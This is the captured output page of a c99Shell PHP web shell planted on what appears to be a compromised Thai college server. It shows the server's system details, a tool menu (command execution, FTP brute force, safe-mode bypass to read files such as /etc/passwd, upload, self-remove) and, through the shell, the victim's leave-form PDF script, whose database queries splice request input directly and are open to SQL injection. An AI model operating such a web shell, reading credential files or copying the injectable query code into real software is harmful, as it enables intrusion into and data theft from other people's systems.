!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prePrintVacationPDF.php (6.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//PDF USING MULTIPLE PAGES
//FILE CREATED BY: Carlos Jos้ Vแsquez Sแez
//YOU CAN CONTACT ME: carlos@magallaneslibre.com
//FROM PUNTA ARENAS, MAGALLANES
//INOVO GROUP - http://www.inovo.cl


/**  Configuration  */
require_once( "../configuration.php" );
require_once( 
$_Config_absolute_path "/includes/connMySQL.class.php");    
require(
'../fpdf/fpdf.php');
        
    
/**  Create Database Object  */
$dbObj = new DBConn;
                
//$query = " SELECT *  FROM personal_tb , position_tb , faculty_tb , district , amphur , province  WHERE personal_tb.Teacher_code='".$_REQUEST['Teacher_code']."' and personal_tb.PositionId = position_tb.PositionId and personal_tb.Faculty_code = faculty_tb.Faculty_code and district.districtId = personal_tb.districtId and amphur.amphurId=district.amphurId and province.provinceId=amphur.provinceId";
$query "SELECT *  FROM personal_tb 
LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId
LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code 
LEFT JOIN district ON personal_tb.districtId = district.districtId 
LEFT JOIN amphur ON personal_tb.amphurId = amphur.amphurId 
LEFT JOIN province ON personal_tb.provinceId = province.provinceId
WHERE personal_tb.Teacher_code='"
.$_REQUEST['Teacher_code']."'";
$result $dbObj->execQuery($query);
$rs $dbObj->fetchArray($result);
            
$query2 " SELECT *  FROM history_absent_tb , history_absent  WHERE history_absent_tb.code='$code' and history_absent_tb.Absent_code = history_absent.Absent_code";
$result2 $dbObj->execQuery($query2);
$rs2 $dbObj->fetchArray($result2); 

$query3 "Select * From  college Where collegeStatus ='1'";
$result3 $dbObj->execQuery($query3);
$rs3 $dbObj->fetchArray($result3);

$query4 "Select * From personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code Where personal_tb.Faculty_code = '".$rs['Faculty_code']."' and personal_tb.TeacherId = '1'";
$result4 $dbObj->execQuery($query4);
$rs4 $dbObj->fetchArray($result4);        

$query5 "Select * From  history_accumu Where Teacher_code = '".$_REQUEST['Teacher_code']."' and Year = '".$rs2['Year']."' ";
$result5 $dbObj->execQuery($query5);
$rs5 $dbObj->fetchArray($result5);

function 
getMonthTh($mm) {
    if(
$mm=='01') { $mm='มกราคม'; }
    else if(
$mm=='02') { $mm='กุมภาพันธ์'; }
    else if(
$mm=='03') { $mm='มีนาคม'; }
    else if(
$mm=='04') { $mm='เมษายน'; }
    else if(
$mm=='05') { $mm='พฤษภาคม';}
    else if(
$mm=='06') { $mm='มิถุนายน'; }
    else if(
$mm=='07') { $mm='กรกฎาคม'; }
    else if(
$mm=='08') { $mm='สิงหาคม'; }
    else if(
$mm=='09') { $mm='กันยายน'; }
    else if(
$mm=='10') { $mm='ตุลาคม';}
    else if(
$mm=='11') { $mm='พฤศจิกายน';}
    else if(
$mm=='12') { $mm='ธันวาคม'; }

    return 
"$mm";
}

//Create new pdf file
$pdf = new FPDF();

//Set thai font
$pdf->SetThaiFont();

$pdf->AddPage();

//-- Load Form Image to Background
$pdf->Image('../form/absent_form_02.jpg'00210297);

//-- Set Font
$pdf->SetFont('AngsanaNew','',15);

//-- College name and Date , Top-Right Position
$date explode("-",$rs2[Date]);
$day intval($date[2]);
$month getMonthTh(intval($date[1]));
$year intval($date[0]);

$pdf->SetXY(60,38);
$pdf->Cell(130,5,$rs3['collegeName'],0,0,'R');

if(!empty(
$day)){
    
$pdf->SetXY(120,46);
    
$pdf->Cell(9,5,$day,0,0,'C');
    
$pdf->SetXY(137.5,46);
    
$pdf->Cell(32,5,$month,0,0,'C');
    
$pdf->SetXY(175.5,46);
    
$pdf->Cell(13,5,$year,0,0,'C');
}
else{
    
$pdf->Text(144,33,' -                          -                          -');
}

//-- Set Font
$pdf->SetFont('AngsanaNew','',13);

//--  Request header
if(!empty($rs2['AbsentNo'])){
    
$pdf->Text(34,49.6,$rs2['AbsentNo']);    
}
else{
    
$pdf->Text(45,49.6,'-');
}

$pdf->Text(38,73.3,'ผู้อำนวยการ '.$rs3['collegeName']);

//-- Body
$pdf->Text(70,83.8,$rs['prefixName'].'  '.$rs['Teacher_name'].'  '.$rs['Teacher_lastname']);
$pdf->Text(135,83.8,$rs['Position_name']);
$pdf->Text(39,91.5,$rs['Faculty_name'].'     '.$rs3['collegeName'].'     สถาบันพระบรมราชชนก');

if(!empty(
$rs5['Times_total'])){
    
$pdf->SetXY(60.3,94.8);
    
$pdf->Cell(6.5,5,$rs5['Times_total'],0,0,'C');
    
    
$pdf->SetXY(161.5,94.8);
    
$pdf->Cell(7,5,(($rs5['Times_total']+10) > 30)?'30':$rs5['Times_total']+10,0,0,'C');
}
else{
    
$pdf->SetXY(60.3,94.8);
    
$pdf->Cell(6.5,5,'-',0,0,'C');
    
    
$pdf->SetXY(161.5,94.8);
    
$pdf->Cell(7,5,'-',0,0,'C');
}

$date_start explode("-",$rs2['Date_start']);
$day_start intval($date_start[2]);
$month_start getMonthTh(intval($date_start[1]));
$year_start intval($date_start[0]);

$date_finish explode("-",$rs2['Date_finish']);
$day_finish intval($date_finish[2]);
$month_finish getMonthTh(intval($date_finish[1]));
$year_finish intval($date_finish[0]);

$pdf->Text(68,106,$day_start.'   '.$month_start.'   '.$year_start);
$pdf->Text(123,106,$day_finish.'   '.$month_finish.'   '.$year_finish);
$pdf->Text(178,106,$rs2['Absent_times']);


$pdf->Text(83,113.7,$rs['Address'].'   ต.'.$rs['districtName'].'  อ.'.$rs['amphurName'].'   จ.'.$rs['provinceName']);

//-- Absent Tables
$pdf->SetFont('AngsanaNew','',15);

$pdf->Text(81,144.6,$rs2['Year']);

$Teacher_code $rs["Teacher_code"];
$query11 "Select Sum(Absent_times) as SumB1 From history_absent_tb  Where  Teacher_code='$Teacher_code'   and  Year='$Year'  and  Absent_code='3' and Date_finish < '".$rs2['Date_finish']."' ";
$result11 $dbObj->execQuery($query11);
$rs11 $dbObj->fetchArray($result11);
$pdf->SetXY(26.3,161);
$pdf->Cell(23.5,5,number_format($rs11[SumB1],1,'.',','),0,0,'C');
$pdf->Cell(23.5,5,$rs2['Absent_times']?number_format($rs2['Absent_times'],1,'.',','):"0.0",0,0,'C');
$pdf->Cell(23.7,5,$rs2['Absent_times']?number_format(($rs11[SumB1]+$rs2['Absent_times']),1,'.',','):number_format($rs11[SumB1],1,'.',','),0,0,'C');

//-- signature
$pdf->SetFont('AngsanaNew','',13);

$pdf->SetXY(132,155);
$pdf->Cell(40,5,$rs['prefixName'].'  '.$rs['Teacher_name'].'  '.$rs['Teacher_lastname'],0,0,'C');

$pdf->SetXY(124.5,193);
$pdf->Cell(60,5,$rs4['prefixName'].'  '.$rs4['Teacher_name'].'  '.$rs4['Teacher_lastname'],0,0,'C');

$pdf->SetXY(124.9,200.5);
$pdf->Cell(60,5,$rs4['Position_name'],0,0,'C');

//Create file
$pdf->Output();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0084 ]--